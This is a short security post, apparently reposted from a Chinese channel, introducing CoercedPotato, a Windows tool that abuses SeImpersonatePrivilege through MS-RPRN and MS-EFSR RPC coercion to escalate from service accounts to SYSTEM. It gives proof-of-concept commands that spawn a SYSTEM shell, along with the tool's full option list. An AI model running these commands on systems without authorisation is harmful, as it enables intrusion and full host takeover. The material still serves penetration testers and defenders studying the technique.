hackvens  潇湘信安  2023-12-07 05:30  Posted from Hunan

Tool overview

CoercedPotato abuses the SeImpersonatePrivilege privilege on Windows 10, Windows 11 and Server 2022 to escalate from LOCAL SERVICE / NETWORK SERVICE to SYSTEM.

Usage

Very quick PoC:

    .\CoercedPotato.exe -c whoami

PoC with an interactive shell:

    .\CoercedPotato.exe -c cmd.exe

The help message can be viewed with the --help option:
    CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.
    Usage: .\CoercedPotato.exe [OPTIONS]

    Options:
      -h,--help                   Print this help message and exit
      -c,--command TEXT REQUIRED  Program to execute as SYSTEM (i.e. cmd.exe)
      -i,--interface TEXT         Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr
      -n,--exploitId INT          Optionnal exploit ID (Only usuable if interface is defined)
                                  -> ms-rprn :
                                     [0] RpcRemoteFindFirstPrinterChangeNotificationEx()
                                     [1] RpcRemoteFindFirstPrinterChangeNotification()
                                  -> ms-efsr
                                     [0] EfsRpcOpenFileRaw()
                                     [1] EfsRpcEncryptFileSrv()
                                     [2] EfsRpcDecryptFileSrv()
                                     [3] EfsRpcQueryUsersOnFile()
                                     [4] EfsRpcQueryRecoveryAgents()
                                     [5] EfsRpcRemoveUsersFromFile()
                                     [6] EfsRpcAddUsersToFile()
                                     [7] EfsRpcFileKeyInfo() # NOT WORKING
                                     [8] EfsRpcDuplicateEncryptionInfoFile()
                                     [9] EfsRpcAddUsersToFileEx()
                                     [10] EfsRpcFileKeyInfoEx() # NOT WORKING
                                     [11] EfsRpcGetEncryptedFileMetadata()
                                     [12] EfsRpcEncryptFileExSrv()
                                     [13] EfsRpcQueryProtectors()

      -f,--force BOOLEAN          Force all RPC functions even if it says 'Exploit worked!' (Default value : false)
      --interactive BOOLEAN       Set wether the process should be run within the same shell or open a new window. (Default value : true)